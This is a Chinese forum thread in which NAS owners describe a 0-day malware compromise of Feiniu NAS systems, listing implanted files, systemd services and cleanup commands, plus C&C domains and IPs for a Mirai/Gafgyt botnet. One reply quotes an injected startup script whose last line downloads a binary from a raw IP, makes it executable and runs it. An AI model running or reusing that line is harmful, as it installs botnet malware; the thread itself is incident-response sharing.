飞牛NAS挂马相关样本

Loyisa

头一次被0day打 纪念一下
https://qfile.qq.com/q/E2GWTawAgg

vt: https://www.virustotal.com/gui/f ... f7d1e536f47e41229e4

---

善后环节
进入你的飞牛ssh 如果发现以下文件即可判定为被入侵:

1. /usr/sbin/gots
   
2. /usr/bin/nginx
   
3. /usr/trim/bin/trim_https_cgi

复制代码

这两个服务是木马相关的

1. /etc/systemd/system/trim_https_cgi.service
   
2. /etc/systemd/system/nginx.service

复制代码

清理:

1. chattr -i /etc/systemd/system/nginx.service
   
2. rm /etc/systemd/system/nginx.service
   
3. chattr -i /etc/systemd/system/trim_https_cgi.service
   
4. rm /etc/systemd/system/trim_https_cgi.service

复制代码

/etc/rc.local 也会被加木马自启，可以直接清空或者删掉

然后需要检查下这两个文件是否异常

1. /usr/trim/bin/system_startup.sh
   
2. /etc/modules <- 这个文件里不应该出现snd_pcap 这个模块，看到了请把那行删了

复制代码

清理木马衍生物:

1. chattr -i /usr/sbin/gots
   
2. rm /usr/sbin/gots
   
3. chattr -i /usr/bin/nginx
   
4. rm /usr/bin/nginx
   
5. chattr -i /usr/trim/bin/trim_https_cgi
   
6. rm /usr/trim/bin/trim_https_cgi

复制代码

清理后重启观察下那几个服务和/etc/rc.local有没有异常，没有就去马上关掉webui外网访问然后去更新最新系统，他们推了版更新修了那个漏洞

莒县小哥

kkdy

火绒高启发kill

猥琐大叔

心醉咖啡

360

Shake2333

360云杀

神龟Turmi

Gafgyt=Mirai
DDoS Botnet远控
C&C：aura.kabot[dot]icu
20.89.168.131 //日本 东京 azure.com
45.95.212.102 //日本 东京 isif.net
已发投诉

naoki

我的被植入  "/usr/trim/bin/system_startup.sh"

1. #!/bin/bash
   
2. 
   
3. STATUS="/var/lib/dpkg/status"
   
4. BACKUP="/var/lib/dpkg/status.original"
   
5. 
   
6. 
   
7. if [ ! -f "$BACKUP" ]; then
   
8.     if [ -f "$STATUS" ]; then
   
9.         cp "$STATUS" "$BACKUP"
   
10.     fi
    
11. fi
    
12. 
    
13. if [ ! -f "$STATUS" ]; then
    
14.     if [ -f "$BACKUP" ]; then
    
15.         cp "$BACKUP" "$STATUS"
    
16.     fi
    
17. fi
    
18. 
    
19. rm -rf /var/tmp/trim-update
    
20. rm -rf /var/tmp/update-*
    
21. 
    
22. wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
    

复制代码

naoki

"/etc/rc.local"文件被植入   
# AutoStart
/sbin/gots fnos &

# AutoStart
/sbin/gots x86 &

post_deleted